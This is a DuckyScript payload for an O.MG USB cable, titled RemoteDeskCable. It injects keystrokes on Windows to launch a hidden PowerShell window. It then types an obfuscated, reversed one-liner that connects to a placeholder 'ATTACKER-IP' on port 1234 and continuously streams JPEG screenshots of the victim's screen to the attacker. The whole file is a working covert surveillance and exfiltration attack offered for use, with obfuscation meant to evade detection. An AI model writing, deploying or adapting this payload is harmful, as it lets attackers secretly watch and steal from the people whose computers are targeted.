REM       RemoteDeskCable
REM       Version 2.0
REM       OS: Windows
REM       Author: 0iphor13
REM	      Requirements: OMG Firmware v.2.5 or higher
REM       description: Getting remote screen access to view your targets actions

DELAY 500
DUCKY_LANG de
DELAY 1500
GUI r
DELAY 500
STRING powershell -NoP -NonI -w hidden
DELAY 500
ENTER
DELAY 500
STRING $IPADDress='ATTACKER-IP';$Port=1234;$bGPy0=")''NIOj-]52,42,4[cepsMOc:VNe$ (& |)63]RAHc[,)601]RAHc[+901]RAHc[+511]RAHc[(  ECalPerc- 69]RAHc[,)47]RAHc[+55]RAHc[+78]RAHc[( ecAlpEr-43]RAHc[,'gIx' ECalPerc- )')(eso'+'lC.SMjms}setyBjms tksj'+'ms esnopseRdneS;rtsjms tksjms esn'+'opseRrtSdneS;gIxnJ7WnJ7Whtgneljms :htgneL-tnetnoCgIx + gIxnJ7Wgepj/egami :epyT-tnetnoCgIx + gIxnJ7Wyradnuob--nJ7WnJ7WgIx = rtsjms;)(yarrAoT.SMjms = setyBjms ]][etyb[;htgneL.SMjms = htgneljms;)(esopsiD.bjms;))gepj::]tamrofegami.gnigami.gniward.met'+'sys[( ,SMjms(evaS.'+'bjms;)0(htgn'+'eLteS.SMjms;)(esopsiD.gjms;)eziS.bjms'+' ,))0,'+'0'+'(tnioP'+'.gniwarD.metsyS tcejbO-weN( ,))0,0'+'(tnioP.gniwarD.metsyS tc'+'ejbO-weN((neercSmorFypoC.gjms;)bjms(eg'+'amImorF::]scihparG.gniwarD.metsyS[ = gjms;)thgieH'+'.sdn'+'uoB.neercSy'+'ramirP::]neercS.smroF.swodniW.metsyS[ ,htdiW.sdnuoB.neercSyramirP::]neerc'+'S.'+'smroF.swodniW.metsyS[(pamtiB.gniwarD.metsyS tcejbO-weN = bjms{)eurTjms( '+'elihw;tksjm'+'s redaeHdneS}serjms ksjms esnopse'+'RrtSdne'+'S;gIxnJ7WnJ7WrJ7Wyra'+'dnuob--=yradnuob ;ecalper-dexim-x/trapitlum :epyT-tnetnoCgIx + gIxnJ7WrJ7Woc'+'tsjms 1.1/PTTHgIx = serjms{)gIx1.1/PTTHg'+'Ix='+'ptthjms,gIxlmth/txetgIx=daehjms,gIxKO 002gIx = octsjms,htgneljms,ksjms ]tek'+'cos.stekcos.ten[(redaeHdneS noitcnuf}}))gnirtsjms'+'(setyBteG.i'+'icsA::]gnidocnE.txet[(dneS.ksjms ='+' stbjms{)detcennoC.ksjms( fi{)gnirtsj'+'ms ,ksjm'+'s(esnopseRrtSdneS noitcnu'+'f}})gnirtsjms(dneS.ksj'+'ms = stbjms{)detcennoC.ksjms( fi{)gnirtsjms ,ksjms(esnopseRdneS'+' noitcnuf;)troPjms,sserddAPIjms(tcennoC.tksjms;)pcT::]epyTlocotorP.ste'+'kcoS.teN.metsyS[ ,maertS::]epyTt'+'ekcoS.stekcoS.teN.m'+'etsyS[ ,krowteNretnI::]ylimaFsserddA.ste'+'kcoS.teN.metsyS[( tekcoS.stekcoS'+'.teN.metsyS tcejbO-weN = tksjms;maertSyrom'+'e'+'M.OI.metsyS t'+'cejbO-weN = SMjms'+' ]maertSy'+'romeM.OI.metsyS[;smroF.swodniW.metsyS emaNylb'+'messA- epyT-ddA'(( ";  . ( $enV:cOMspEc[4,15,25]-joIn'') ( "$(SEt-item 'vaRIaBLE:oFs'  '' )"+ [sTriNG]( ( vaRIABlE BgpY0 -VAl  )[ - 1..- ( ( vaRIABlE BgpY0 -VAl  ).LENgTh) ] )+"$(seT-VARiABLe 'oFS' ' ')")
DELAY 250
ENTER 
